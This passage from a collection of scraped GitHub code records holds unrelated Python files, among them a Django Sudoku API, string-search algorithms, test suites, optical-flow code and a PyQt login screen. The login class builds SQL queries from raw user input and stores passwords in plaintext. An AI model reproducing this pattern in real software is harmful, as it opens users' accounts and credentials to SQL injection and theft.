Puzzle.objects.get_total_values(difficulty)\n if not available_puzzles:\n available_puzzles = Puzzle.objects.all()\n last = available_puzzles.count() - 1\n puzzle_id = random.randint(0, last)\n try:\n return available_puzzles[int(puzzle_id)]\n except IndexError:\n raise Http404(\"Sorry, that puzzle doesn't exist.\")\n\n def _build_puzzle(self, db_puzzle):\n \"\"\"\n Fetch a puzzle from the DB based on ID.\n Then format the output so the template can understand it.\n \"\"\"\n\n # Load blank puzzle then replace it with the values of the loaded puzzle\n values = PuzzleValue.objects.filter(puzzle__id=db_puzzle.id)\n puzzle = []\n for y in range(db_puzzle.height):\n row = []\n for x in range(db_puzzle.width):\n row.append(0)\n puzzle.append(row)\n for value in values:\n puzzle[value.y_cord][value.x_cord] = value.value\n\n # Try to get locations of where to draw thick borders, 404 otherwise.\n try:\n width_border = [x*int(sqrt(len(puzzle[0]))) for x in range(int(sqrt(len(puzzle[0]))))]\n height_border = [x*int(sqrt(len(puzzle))) for x in range(int(sqrt(len(puzzle))))]\n except IndexError:\n raise Http404(\"Sorry, the puzzle u request isn't valid.\")\n\n return {\n 'puzzle': puzzle,\n 'puzzle_id': db_puzzle.pk,\n 'width_border': width_border,\n 'height_border': height_border,\n }\n\n\nclass APIView(PlayView):\n \"\"\"Django class-based view for the ajax api.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialize a new `APIView` instance.\"\"\"\n super(APIView, self).__init__(**kwargs)\n\n def get(self, request, *args, **kwargs):\n \"\"\"Return `APIView` json.\"\"\"\n context = self.get_context_data(request, **kwargs)\n return JsonResponse(context)\n\n def get_context_data(self, request, **kwargs):\n \"\"\"Get context function for the api.\"\"\"\n action = 
request.GET.get('action', None)\n\n board_html = ''\n checked = ''\n\n # if the action is new, return a new Sudoku puzzle.\n # Otherwise, check the current puzzle and return the result of the check.\n if action == 'new':\n difficulty = request.GET.get('difficulty', None)\n puzzle_data = self._build_puzzle(self._get_random_puzzle(difficulty))\n board_html = render_to_string('play/board.html', puzzle_data)\n else:\n puzzle = json.loads(request.GET.get('puzzle', None))\n checked = self._check_puzzle(puzzle)\n\n context = {\n 'result': checked,\n 'board_html': board_html,\n }\n\n return context\n\n def _check_puzzle(self, puzzle):\n \"\"\"Check the puzzle and return its status\"\"\"\n if puzzle:\n # First, check if the puzzle is complete and correct.\n checked = Checker(puzzle).validate()\n if not checked:\n # If the puzzle is not complete or not correct,\n # Check to see if it's correct while being incomplete.\n checked = Checker(puzzle, True).validate()\n if checked:\n # return problem, if the puzzle is not complete but correct.\n checked = 'ok'\n else:\n # return problem, if the puzzle is not correct.\n checked = 'problem'\n else:\n # return complete, if the puzzle is complete and correct.\n checked = 'complete'\n else:\n # return error, if the function got None for the puzzle\n checked = 'error'\n\n return checked\n\n","repo_name":"RyanNoelk/Sudoku","sub_path":"play/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73953931369","text":"\n\n# O(n*m); O(1)\ndef implementStr(haystack, needle):\n if not needle: return 0\n left, right = 0, len(needle)\n\n while right < len(haystack):\n if haystack[left:right] == needle:\n return left\n left, right = left + 1, right + 1\n\n return False, -1\n\n\n# print(implementStr(\"hello\", \"ll\"))\n\n\n# O(n+m) || O(m) n is main string and m is the substring\ndef KMP(string, substring):\n haystack = string\n needle = substring\n if needle == \"\": return 0\n lps = [0] * len(needle)\n \n prevLPS, i = 0, 1\n while i < len(needle):\n if needle[i] == needle[prevLPS]:\n lps[i] = prevLPS + 1\n prevLPS += 1\n i += 1\n elif prevLPS == 0:\n lps[i] = 0\n i += 1\n else:\n prevLPS = lps[prevLPS - 1]\n \n i = 0 # ptr for haystack\n j = 0 # ptr for needle\n while i < len(haystack):\n if haystack[i] == needle[j]:\n i, j = i + 1, j + 1\n else:\n if j == 0:\n i += 1\n else:\n j = lps[j - 1]\n if j == len(needle):\n return i - len(needle)\n return -1\n\n # if not substring: return 0\n # i, j = 0, 0\n # lps = buildPattern(substring)\n # while i < len(string):\n # if string[i] == string[j]:\n # i += 1\n # j += 1\n # else:\n # if j == 0:\n # i += 1\n # else:\n # j = lps[j-1]\n \n # if j == len(substring):\n # return i - len(substring)\n\n # return -1\n \ndef buildPattern(substring):\n lps = [0] * len(substring)\n \n prevLPS, i = 0, 1\n while i < len(substring):\n if substring[i] == substring[prevLPS]:\n lps[i] = prevLPS + 1\n prevLPS += 1\n i += 1\n elif prevLPS == 0:\n lps[i] = 0\n i += 1\n else:\n prevLPS = lps[prevLPS - 1]\n \n return lps\n\n # lps = [0] * len(string)\n\n # prevLps, i = 0, 1\n\n # while i < len(substring):\n # if substring[i] == substring[prevLps]:\n # lps[i] = prevLps + 1\n # prevLps += 1\n # i += 1\n # elif prevLps == 0:\n # lps[i] = 0\n # i += 1\n # else:\n # prevLps = lps[prevLps - 1]\n \n \n\n\nprint(KMP('hello', 'll'))\nprint(KMP('a', 
'a'))\n","repo_name":"ArshErgon/Leetcode-Question-Solution","sub_path":"LeetCode/easy/implementStrStr.py","file_name":"implementStrStr.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11299160671","text":"#Melhore o DESAFIO 061, perguntando para o usuário se ele\n# quer mostrar mais alguns termos. O programa\n# encerrará quando ele disser que quer mostrar 0 termos#\nprimeiro = int(input('digite o primeiro termo: '))\nrazao = int(input('digite a razao: '))\ntermo = primeiro\ncont = 1\ntotal = 0\nmais = 10\nwhile mais != 0:\n total = total + mais\n while cont <= total:\n print('{} ->'.format(termo), end='')\n termo += razao\n cont += 1\n print('pausa')\n mais = int(input('quantos trmos vc deseja mostrar a mais: [0] para sair'))\nprint('FIM')\nprint('voce digitou ao total {} termos'.format(total))","repo_name":"LindomarB/Curso-em-video-python-git","sub_path":"pythonexercicios/ex062 super p.a.py","file_name":"ex062 super p.a.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13917439931","text":"_base_ = ['../_base_/torchscript_config.py', '../_base_/backends/coreml.py']\n\ncodebase_config = dict(type='mmpretrain', task='Classification')\n\nbackend_config = dict(model_inputs=[\n dict(\n input_shapes=dict(\n input=dict(\n min_shape=[1, 3, 224, 224],\n max_shape=[8, 3, 224, 224],\n default_shape=[1, 3, 224, 224])))\n])\n","repo_name":"open-mmlab/mmdeploy","sub_path":"configs/mmpretrain/classification_coreml_dynamic-224x224-224x224.py","file_name":"classification_coreml_dynamic-224x224-224x224.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"20000205076","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\n\nclass GetHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header('Content-Type', 'text-html')\n self.end_headers()\n greeting = \"Hello Emerging Tech Valencia!!\\n\"\n self.wfile.write(greeting.encode())\n return\n\ntry:\n server = HTTPServer(('0.0.0.0', 8080), GetHandler)\n server.serve_forever()\n\nexcept KeyboardInterrupt:\n print(\"Shutting down web server\")\n server.socket.close()","repo_name":"mvazquezc/meetup-pyapp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20611491441","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport pytest\nfrom six.moves import mock\nimport tensorflow as tf\n\nfrom nvidia_tao_tf1.core.coreobject import deserialize_tao_object\nfrom nvidia_tao_tf1.core.processors import RandomRotation\nfrom nvidia_tao_tf1.core.processors.augment.spatial import rotation_matrix\nfrom nvidia_tao_tf1.core.types import Canvas2D, Transform\n\n\n@pytest.mark.parametrize(\n \"probability, message\",\n [\n (-0.1, \"RandomRotation.probability (-0.1) is not within the range [0.0, 1.0].\"),\n (1.1, \"RandomRotation.probability (1.1) is not within the range [0.0, 1.0].\"),\n ],\n)\ndef test_raises_on_invalid_probability(probability, message):\n with pytest.raises(ValueError) as exc:\n RandomRotation(min_angle=7, max_angle=7, probability=probability)\n assert str(exc.value) == 
message\n\n\n@pytest.mark.parametrize(\n \"min_angle, message\",\n [\n (-600, \"RandomRotation.min_angle (-600) is smaller than -360.0 degrees.\"),\n (\n 8,\n \"RandomRotation.min_angle (8) is greater than RandomRotation.max_angle (7).\",\n ),\n ],\n)\ndef test_raises_on_invalid_min_angle(min_angle, message):\n with pytest.raises(ValueError) as exc:\n RandomRotation(min_angle=min_angle, max_angle=7, probability=0.5)\n assert str(exc.value) == message\n\n\n@pytest.mark.parametrize(\n \"max_angle, message\",\n [(361, \"RandomRotation.max_angle (361) is greater than 360.0 degrees.\")],\n)\ndef test_raises_on_invalid_max_angle(max_angle, message):\n with pytest.raises(ValueError) as exc:\n RandomRotation(min_angle=7, max_angle=max_angle, probability=0.5)\n assert str(exc.value) == message\n\n\n@mock.patch(\"nvidia_tao_tf1.core.processors.augment.random_rotation.tf.random.uniform\")\n@mock.patch(\"nvidia_tao_tf1.core.processors.augment.random_rotation.spatial.rotation_matrix\")\ndef test_delegates_random_angle_to_rotation_matrix(\n mocked_rotation_matrix, mocked_random_uniform\n):\n \"\"\"Test RandomRotation processor call.\"\"\"\n transform = Transform(\n canvas_shape=Canvas2D(height=12, width=10),\n color_transform_matrix=tf.eye(4),\n spatial_transform_matrix=tf.eye(3),\n )\n mocked_rotation_matrix.return_value = tf.eye(3)\n seven = tf.constant(7.0, dtype=tf.float32)\n mocked_random_uniform.return_value = seven\n\n processor = RandomRotation(min_angle=40, max_angle=90, probability=1.0)\n processor(transform)\n mocked_rotation_matrix.assert_called_with(seven, height=12, width=10)\n\n\n@mock.patch(\"nvidia_tao_tf1.core.processors.augment.random_rotation.tf.random.uniform\")\n@pytest.mark.parametrize(\n \"batch_size\", [None, 3, tf.compat.v1.placeholder(dtype=tf.int32)]\n)\ndef test_random_rotation(mocked_random_uniform, batch_size):\n \"\"\"Test RandomRotation processor.\"\"\"\n batch_shape = [] if batch_size is None else [batch_size]\n transform = Transform(\n canvas_shape=Canvas2D(height=12, width=10),\n color_transform_matrix=tf.eye(4, batch_shape=batch_shape, dtype=tf.float32),\n spatial_transform_matrix=tf.eye(3, batch_shape=batch_shape, dtype=tf.float32),\n )\n\n feed_dict = {}\n if type(batch_size) == tf.Tensor:\n feed_dict = {batch_size: 7}\n\n rnd = tf.fill(dims=batch_shape, value=0.5)\n mocked_random_uniform.return_value = rnd\n\n processor = RandomRotation(min_angle=40, max_angle=90, probability=1.0)\n stm = processor(transform)\n\n expected_stm = rotation_matrix(rnd, 10, 12)\n if batch_size is None:\n assert expected_stm.shape.ndims == 2\n else:\n assert expected_stm.shape.ndims == 3\n stm, expected_stm = tf.compat.v1.Session().run(\n [stm.spatial_transform_matrix, expected_stm], feed_dict=feed_dict\n )\n np.testing.assert_equal(stm, expected_stm)\n\n\ndef test_serialization_and_deserialization():\n \"\"\"Test that it is a MaglevObject that can be serialized and deserialized.\"\"\"\n processor = RandomRotation(min_angle=40, max_angle=90, probability=1.0)\n processor_dict = processor.serialize()\n deserialized_processor = deserialize_tao_object(processor_dict)\n assert processor._min_angle == deserialized_processor._min_angle\n assert processor._max_angle == deserialized_processor._max_angle\n assert processor._probability == 
deserialized_processor._probability\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/core/processors/augment/test_random_rotation.py","file_name":"test_random_rotation.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"9322476037","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\n\r\ndef compute(input1, input2,input3,input4,input5):\r\n    \r\n#    num_companies = 50\r\n#    profession_options = ['Film and television', 'Visual arts', 'Fashion and beauty', 'Architect', 'Interior designer']\r\n#    num_hashtags_per_profession = 10\r\n#    companies = pd.DataFrame(columns=['username', 'hashtags', 'profession', 'experience_level', 'location'])\r\n\r\n#    for i in range(num_companies):\r\n#        # Randomly choose up to two professions for the company\r\n#        professions = np.random.choice(profession_options, size=np.random.randint(1, 3), replace=False)\r\n#        professions_str = ', '.join(professions)\r\n#        # Generate a hashtag vector with 50 bits\r\n#        hashtags = np.zeros(50)\r\n#        for profession in professions:\r\n#            # Find the index of the profession in the profession_options list\r\n#            profession_index = profession_options.index(profession)\r\n#            # Set the corresponding 10 bits to 1 for the profession\r\n#            hashtags[profession_index*num_hashtags_per_profession:(profession_index+1)*num_hashtags_per_profession] = 1\r\n#        companies.loc[i] = ['company' + str(i), hashtags.astype(int).tolist(), professions_str,\r\n#                            np.random.randint(1, 6), 'location' + str(np.random.randint(1, 6))]\r\n\r\n    hashtags = ['#filmmaking', '#television', '#cinema', '#filmproduction', '#acting', '#screenwriting','#act','#direct','#shortfilm','#cinematography',\r\n                '#design', '#graphicdesign', '#drawing', '#sculpture', '#photography', '#printmaking', '#visualarts','#mixedmedia','#gallery','#illustrations','#sketch',\r\n                '#fashion', '#beauty', '#style', '#modeling', '#makeup', '#designer', '#fashionista','#streetstyle','#accessories','#nails',\r\n                '#architecture', '#construction', '#building', '#architecturaldesign', '#urbanplanning','#modern' ,'#historic','#landscape','#monument',\r\n                '#interiordesign', '#homedecor', '#homeimprovement', '#furniture','#homecolor','#homestyling','#interiorforall','#roomdecor']\r\n\r\n    # input_list = ['#cinema', '#acting', '#graphicdesign', '#fashion', '#architecture']\r\n    # gather the five hashtag arguments passed to compute() into a single list\r\n    input_list = [input1, input2, input3, input4, input5]\r\n    result = []\r\n\r\n    for i in range(0,len(hashtags)):\r\n        if(hashtags[i] in input_list):\r\n            result.append(1)\r\n        else:\r\n            result.append(0)\r\n\r\n    return result","repo_name":"Kavisha4/13_HashConnect","sub_path":"python_model/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22937308477","text":"listdata=[]\nwhile True: #while 문은 들여쓰기,전체드래그후 탭)\n    print('''\n    =====================리스트 데이터 관리=====================\n    1. 
리스트 추가 2.리스트 데이터 수정 3.리스트 데이터 삭제 4.종료\n    ''')\n    menu = int(input(\"메뉴를 선택해라\")) #숫자일경우 input 앞에 int\n\n    if menu == 4 :\n        break\n    elif menu == 1 :\n        data=input(\"추가할 데이터를 입력하세요\")\n        listdata.append(data)\n        print(listdata)\n    elif menu == 2 :\n        data=input(\"수정할 데이터를 입력하세요\")\n        a=int(input(\"몇번째 데이터?\"))\n        listdata[a-1]=data\n        print(listdata)\n    elif menu == 3 :\n        a=int(input(\"몇번째 데이터?\"))\n        del listdata[a-1]\n        print(listdata)\n    ","repo_name":"Aiden0626/kmove_python","sub_path":"basic/while_test.py","file_name":"while_test.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27867293043","text":"import os\nos.system('cls')\nalunos = []\nclass aluno:\n    media = 0\n    passou = False\n    nome =\"\"\n    def __init__(self,m,p,n):\n        self.media = m\n        self.passou = p\n        self.nome = n\n    def info(self):\n        aprovacao = \"Aprovado\" if self.media >= 6 else \"Reprovado\"\n        print(\"Aluno(a):\", self.nome, \"\\nMédia:\", str(self.media), \"\\nEle(a) está:\", str(aprovacao))\n        print(\"------------------------\")\n\n\n\ndef Menu():\n    print(\"1 - Cadastrar Novo Aluno\")\n    print(\"2 - Listar Alunos\")\n    print(\"3 - Informações do Aluno\")\n    print(\"4 - Excluir aluno do cadastro\")\n    print(\"5 - Listar todos alunos e informações \")\n    print(\"6 - Sair\")\n    opc = input(\"Digite uma opção: \")\n    return opc\n\n\ndef Novo_aluno():\n    os.system('cls')\n    n = input(\"Nome do Aluno: \")\n    p = False\n    m = input(\"Média do Aluno: \")\n    al = aluno(int(m),p,n)\n    alunos.append(al)\n    print(\"Aluno cadastrado\")\n    os.system(\"pause\")\n\n\n\ndef Informacoes():\n    os.system('cls')\n    a = input(\"Digite o numero do Aluno que deseja ver as informações: \")\n    try:\n        alunos[int(a)].info()\n    except:\n        print(\"Aluno não existe no cadastro\")\n    os.system(\"pause\")\n\n\n\ndef ExcluirAluno():\n    os.system('cls')\n    a = input(\"Digite o numero do Aluno que deseja excluir do cadastro: \")\n    try:\n        del alunos[int(a)]\n    except:\n        print(\"Aluno não existe no cadastro\")\n    os.system(\"pause\")\n\n\ndef listarAlunos():\n    os.system('cls')\n    p = 0\n    for i in alunos:\n        print(str(p) + \" -\" , i.nome)\n        p = p+1\n    os.system(\"pause\")\n\n\ndef listartudo():\n    os.system('cls')\n    for i in alunos:\n        i.info()\n    os.system(\"pause\")\nret = Menu()\nwhile ret < \"6\":\n    if ret == \"1\":\n        Novo_aluno()\n    elif ret == \"2\":\n        listarAlunos()\n    elif ret == \"3\":\n        Informacoes()\n    elif ret == \"4\":\n        ExcluirAluno()\n    elif ret == \"5\":\n        listartudo()\n    ret = Menu()\nos.system('cls')\nprint(\"Finalizando o programa....\\nPrograma finalizado!\")\n","repo_name":"GuilhermeFusari/ProjetosEstudo","sub_path":"Cadastro de Alunos.py","file_name":"Cadastro de Alunos.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"15363589266","text":"import os\nimport subprocess as sp\nfrom unittest.mock import patch\n\nimport luigi\nfrom workflow.workflow import execute_command, ExtractLoadAirportData, DbtDeps, DbtSeedAirports, DbtRunAirports, ScrapeLoadArrivalData, DbtSeedArrivals, DbtRunAnalysis\n\ndef test_extract_load_airport_data_output():\n    task = ExtractLoadAirportData()\n    assert isinstance(task.output(), luigi.LocalTarget)\n    assert task.output().path == '0_ExtractLoadAirportData.output'\n\ndef test_dbt_deps_output():\n    task = DbtDeps()\n    assert isinstance(task.output(), luigi.LocalTarget)\n    assert task.output().path == '1_DbtDeps.output'\n\ndef test_dbt_seed_airports_output():\n    
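# the numeric prefix in the target path encodes this task's position in the pipeline\n    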
task = DbtSeedAirports()\n assert isinstance(task.output(), luigi.LocalTarget)\n assert task.output().path == '2_DbtSeedAirports.output'\n\ndef test_dbt_run_airports_output():\n task = DbtRunAirports()\n assert isinstance(task.output(), luigi.LocalTarget)\n assert task.output().path == '3_DbtRunAirports.output'\n\ndef test_scrape_load_arrival_data_output():\n task = ScrapeLoadArrivalData()\n assert isinstance(task.output(), luigi.LocalTarget)\n assert task.output().path == '4_ScrapeLoadArrivalData.output'\n\ndef test_dbt_seed_arrivals_output():\n task = DbtSeedArrivals()\n assert isinstance(task.output(), luigi.LocalTarget)\n assert task.output().path == '5_DbtSeedArrival.output'\n\ndef test_dbt_run_analysis_output():\n task = DbtRunAnalysis()\n assert isinstance(task.output(), luigi.LocalTarget)\n assert task.output().path == '6_DbtRunAnalysis.output'\n\n@patch(\"workflow.workflow.execute_command\", return_value=\"Mocked output\")\ndef test_extract_load_airport_data_run(mocked_output):\n task = ExtractLoadAirportData()\n task.run()\n assert os.path.isfile(task.output().path)\n with open(task.output().path, \"r\") as f:\n assert f.read() == \"Mocked output\"\n os.remove(task.output().path)\n\n\n","repo_name":"1bk/simple-airports-analysis","sub_path":"tests/workflow/test_workflow.py","file_name":"test_workflow.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"8324599016","text":"import cv2\nimport numpy as np\n\ndef lucas_kanade_np(prvs, next, win=2):\n\n assert prvs.shape == next.shape\n\n im1 = np.zeros(prvs.shape[:2], dtype=np.uint8)\n\n if prvs.ndim == 3:\n im1 = cv2.cvtColor(prvs, cv2.COLOR_BGR2GRAY)\n else:\n im1[...] = prvs\n\n im2 = np.zeros(next.shape[:2], dtype=np.uint8)\n\n if next.ndim == 3:\n im2 = cv2.cvtColor(next, cv2.COLOR_BGR2GRAY)\n else:\n im2[...] 
= next\n\n I_x = np.zeros(im1.shape)\n I_y = np.zeros(im1.shape)\n I_t = np.zeros(im1.shape)\n I_x[1:-1, 1:-1] = (im1[1:-1, 2:] - im1[1:-1, :-2]) / 2\n I_y[1:-1, 1:-1] = (im1[2:, 1:-1] - im1[:-2, 1:-1]) / 2\n I_t[1:-1, 1:-1] = im1[1:-1, 1:-1] - im2[1:-1, 1:-1]\n params = np.zeros(im1.shape + (5,)) #Ix2, Iy2, Ixy, Ixt, Iyt\n params[..., 0] = I_x * I_x # I_x2\n params[..., 1] = I_y * I_y # I_y2\n params[..., 2] = I_x * I_y # I_xy\n params[..., 3] = I_x * I_t # I_xt\n params[..., 4] = I_y * I_t # I_yt\n del I_x, I_y, I_t\n cum_params = np.cumsum(np.cumsum(params, axis=0), axis=1)\n del params\n win_params = (cum_params[2 * win + 1:, 2 * win + 1:] -\n cum_params[2 * win + 1:, :-1 - 2 * win] -\n cum_params[:-1 - 2 * win, 2 * win + 1:] +\n cum_params[:-1 - 2 * win, :-1 - 2 * win])\n del cum_params\n op_flow = np.zeros(im1.shape + (2,))\n det = win_params[...,0] * win_params[..., 1] - win_params[..., 2] **2\n op_flow_x = np.where(det != 0, (win_params[..., 1] * win_params[..., 3] - win_params[..., 2] * win_params[..., 4]) / det, 0)\n op_flow_y = np.where(det != 0, (win_params[..., 0] * win_params[..., 4] - win_params[..., 2] * win_params[..., 3]) / det,0)\n op_flow[win + 1: -1 - win, win + 1: -1 - win, 0] = op_flow_x[:-1, :-1]\n op_flow[win + 1: -1 - win, win + 1: -1 - win, 1] = op_flow_y[:-1, :-1]\n\n return np.array(op_flow)","repo_name":"mcv-m6-video/mcv-m6-2018-team8","sub_path":"methods/LucasKanade.py","file_name":"LucasKanade.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31791088507","text":"\"\"\"\nPlot a lift curve, which shows the gain of the model compared to a random guess.\nImplements OneVsRest for multi-class classifications.\n\nInspired by https://www3.nd.edu/~busiforc/Lift_chart.html\n\"\"\"\n\nfrom typing import List, Tuple\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib.axes import Axes\nfrom matplotlib.ticker import PercentFormatter\nfrom sklearn.preprocessing import label_binarize\n\nfrom ml_tooling.metrics import lift_score\nfrom ml_tooling.utils import VizError, DataType\n\n\ndef plot_lift_curve(\n y_true: DataType,\n y_proba: DataType,\n title: str = None,\n ax: Axes = None,\n labels: List[str] = None,\n threshold: float = 0.5,\n) -> Axes:\n \"\"\"\n Plot a lift chart from results. 
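The lift at each fraction of the data is the cumulative gain divided by that fraction, so values above 1 beat random selection. 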
Also calculates the lift score at the given threshold (default 0.5).\n\n Parameters\n ----------\n y_true: DataType\n True labels\n\n y_proba: DataType\n Model's predicted probability\n\n title: str\n Plot title\n\n ax: Axes\n Pass your own ax\n\n labels: List of str\n Labels to use per class\n\n threshold: float\n Threshold to use when determining lift score\n\n Returns\n -------\n matplotlib.Axes\n \"\"\"\n\n if ax is None:\n fig, ax = plt.subplots()\n\n title = \"Lift Curve\" if title is None else title\n classes = np.unique(y_true)\n binarized_labels = label_binarize(y_true, classes=classes)\n\n if labels and len(labels) != len(classes):\n raise VizError(\n \"Number of labels must match number of classes: \"\n f\"got {len(labels)} labels and {len(classes)} classes\"\n )\n\n if binarized_labels.shape[1] == 1:\n # Binary classification case\n percents, gains = _cum_gain_curve(binarized_labels, y_proba[:, 1])\n score = lift_score(binarized_labels.ravel(), y_proba[:, 1] > threshold)\n ax.plot(percents, gains / percents, label=f\"$Lift = {score:.2f}$\")\n else:\n # Multi-class case\n for class_ in classes:\n percents, gains = _cum_gain_curve(\n binarized_labels[:, class_], y_proba[:, class_]\n )\n score = lift_score(\n binarized_labels[:, class_], y_proba[:, class_] > threshold\n )\n ax.plot(\n percents,\n gains / percents,\n label=f\"Class {labels[class_] if labels else class_} \"\n f\"$Lift = {score:.2f}$ \",\n )\n\n ax.axhline(y=1, color=\"grey\", linestyle=\"--\", label=\"Baseline\")\n ax.set_title(title)\n ax.set_ylabel(\"Lift\")\n ax.set_xlabel(\"% of Data\")\n formatter = PercentFormatter(xmax=1)\n ax.xaxis.set_major_formatter(formatter)\n ax.legend()\n return ax\n\n\ndef _cum_gain_curve(\n y_true: np.ndarray, y_proba: np.ndarray\n) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Calculate a cumulative gain curve of how many positives are captured\n per percent of sorted data.\n\n :param y_true:\n True labels\n\n :param y_proba:\n Predicted probability\n\n :return:\n array of data percents and cumulative gain\n \"\"\"\n n = len(y_true)\n n_true = np.sum(y_true)\n\n idx = np.argsort(y_proba)[::-1] # Reverse sort to get descending values\n cum_gains = np.cumsum(y_true[idx]) / n_true\n percents = np.arange(1, n + 1) / n\n return percents, cum_gains\n","repo_name":"andersbogsnes/ml_tooling","sub_path":"src/ml_tooling/plots/lift_curve.py","file_name":"lift_curve.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"8447776854","text":"import MainMenuClass\nimport sqlite3\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\nfrom AllConstants import *\n\n\nclass RegistrationClass(QWidget):\n def __init__(self):\n super().__init__()\n uic.loadUi('../AllActivities/registrationActivity.ui', self)\n self.setFixedWidth(XREGISTRSIZE)\n self.setFixedHeight(YREGISTRSIZE)\n self.setWindowTitle('Authorization')\n\n self.btn_registr.clicked.connect(self.Registrate)\n self.btn_avtoriz.clicked.connect(self.LoginToGame)\n\n self.db = sqlite3.connect('profiles_db.db')\n self.cursor = self.db.cursor()\n\n def Registrate(self):\n Opened = True\n self.lbl_error_value.setText('')\n allLogins = self.cursor.execute(f''' SELECT login FROM allLogins WHERE login = '{self.ledit_login.text()}' ''').fetchall()\n if len(allLogins) != 0:\n Opened = False\n if self.ledit_login.text() != '' and len(self.ledit_password.text()) >= 8 and Opened:\n query = f''' INSERT INTO allLogins (login, password) 
VALUES('{self.ledit_login.text()}', '{self.ledit_password.text()}') '''\n self.cursor.execute(query)\n self.db.commit()\n self.menu = MainMenuClass.MainMenuInit(self.ledit_login.text())\n self.menu.show()\n self.hide()\n\n query = f''' INSERT INTO profiles (login, status, nickname, bestRecord)\n VALUES('{self.ledit_login.text()}', 'No', '{self.ledit_login.text()}', 0) '''\n self.cursor.execute(query)\n self.db.commit()\n\n # write every in-game record for the new profile\n recordwriting = open(f'../allCSVFiles/records_{self.ledit_login.text()}.csv', 'w', encoding='utf8')\n for i in range(3, 9):\n for j in range(3, 9):\n recordwriting.write(';'.join([str(i), str(j), '0', '\\n']))\n recordwriting.close()\n elif not Opened:\n errorWindow = QMessageBox()\n errorWindow.setIcon(QMessageBox.Critical)\n errorWindow.setWindowTitle(\"Registration error\")\n errorWindow.setText('This login is already taken')\n errorWindow.exec_()\n else:\n errorWindow = QMessageBox()\n errorWindow.setIcon(QMessageBox.Critical)\n errorWindow.setWindowTitle(\"Registration error\")\n errorWindow.setText('Invalid login or password')\n errorWindow.exec_()\n\n\n def LoginToGame(self):\n self.lbl_error_value.setText('')\n query = f''' SELECT * FROM allLogins WHERE login = '{self.ledit_login.text()}' '''\n resourses = self.cursor.execute(query).fetchall()\n windowOpened = True\n for i in resourses:\n if i[1] == self.ledit_password.text():\n self.db.close()\n self.menu = MainMenuClass.MainMenuInit(self.ledit_login.text())\n self.menu.show()\n self.hide()\n windowOpened = False\n if windowOpened:\n errorWindow = QMessageBox()\n errorWindow.setIcon(QMessageBox.Critical)\n errorWindow.setWindowTitle(\"Login error\")\n errorWindow.setText('Wrong login or password')\n errorWindow.exec_()\n","repo_name":"AmirHai/project_2048","sub_path":"AllClasses/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16169658575","text":"import os\nimport argparse\nfrom typing import List, Union\n\nfrom nltk.tree import Tree\nfrom nltk.grammar import CFG, Production, Nonterminal \n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--grammar_file',\n default=\"/home/pavlo/comp-550/comp-550-a2/input/grammar_fr.txt\", \n help='Grammar file.')\n args = parser.parse_args()\n\n return args\n\n\nclass CYK:\n\n def __init__(self, cfg: CFG) -> None:\n assert(isinstance(cfg, CFG)), \"grammar must be of type nltk.CFG\"\n self.cfg = cfg\n self.cfg_nonterminals = {p.lhs().symbol() for p in cfg.productions()}\n # self.cfg_unary_productions = {p for p in cfg.productions() \n # if len(p.rhs()) == 1 and \n # p.rhs()[0].symbol() in self.cfg_nonterminals}\n self.cnf = to_cnf(cfg)\n\n def parse(self, sentence: Union[str, List[str]], keep_cnf: bool=False) -> List[Tree]:\n words = sentence if isinstance(sentence, list) else sentence.split()\n\n table = [[[] for _ in range(len(words)+1)] for _ in range(len(words))]\n\n for j in range(1, len(words)+1):\n for production in self.cnf.productions(rhs=words[j-1]):\n table[j-1][j].append((production,))\n for i in range(j-2, -1, -1):\n for k in range(i+1, j):\n for production in self.cnf.productions():\n if production.is_nonlexical():\n B = production.rhs()[0]\n C = production.rhs()[1]\n if (B in [x[0].lhs() for x in table[i][k]] and \n C in [x[0].lhs() for x in table[k][j]]):\n table[i][j].append((production, k))\n # for t in table:\n # print(t)\n return self.build_trees(table=table, 
